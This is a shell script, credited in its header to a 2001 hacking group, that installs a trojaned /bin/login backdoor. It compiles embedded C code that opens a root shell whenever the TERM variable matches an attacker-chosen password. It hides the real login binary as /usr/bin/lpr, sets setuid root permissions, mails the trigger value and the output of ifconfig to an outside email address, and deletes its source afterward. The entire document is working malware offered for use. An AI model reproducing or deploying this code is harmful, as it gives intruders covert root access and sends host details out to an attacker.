#!/bin/sh
# SECURIFY BACKDOOR TERM login # Coded
by=bigm@st3r.biz
# 02.27.2001 - www.securify.net - #securify@irc.dal.net
echo "SECURIFY TERM BACKDOOR login"
echo "Coded by ^Sang^^pRaBu^ (bigm@st3r.biz)"
echo
# cheking TERM parameter
if [ $# -ne 1 ]; then
	echo "Usage: $0 <term>"
	echo ""
	exit 1
fi
# geting TERM parameter
pass=$1
# checking gcc compiler
if [ -f /usr/bin/gcc ] 
then
echo "[-] loading"
# making backdoor login
cat >> login.c << _EOF_
#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <sys/time.h>
#include <string.h>
#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/usr/bin/lpr"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "$pass"
#define ENV_FIX "vt100"

int owned(void);

char **av, **ep;

int main(int argc, char **argv, char **envp) {
   av=argv;
   ep=envp;
   av[0]=SHELL_CALLME;
        
   if (owned()) {
   char *sav[]={
       SHELL_CALLME, NULL
   };

	 execve(SHELL, sav, ep);
	 return 0;
   }
   execve(LOGIN, av, ep);
   return 0;   
}

int owned(void) {
   char *name, *value;
   int i;
   for (i=0; ep[i]!=NULL; ++i) {
      name=strtok(ep[i], "=");
      value=strtok(NULL, "=");
      if (name==NULL || value==NULL) continue;
      if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
	 if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
	    char tmp[100];
	sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX); 
	ep[i]=strdup(tmp);
	    return 1;
	 }
      }
   }
   return 0;
}

_EOF_
# moving real login change with backdoored login
cc -o login login.c
echo "[-] progressing"
chown root.bin login
chmod 4555 login
chmod u-w login
mv /bin/login /usr/bin/lpr
echo "TERM=$pass" >> /tmp/root.cron
sbin/ifconfig -a >> /tmp/root.cron
mail -s root.cron $by < /tmp/root.cron 
rm -f /tmp/root.cron
mv login /bin/login 
chmod 555 /usr/bin/lpr
chown root.bin /usr/bin/lpr
rm -f login.c
echo "[-] created TERM=$pass" 
echo
else 
echo "[x] gcc compiler not found"
exit 0 
fi

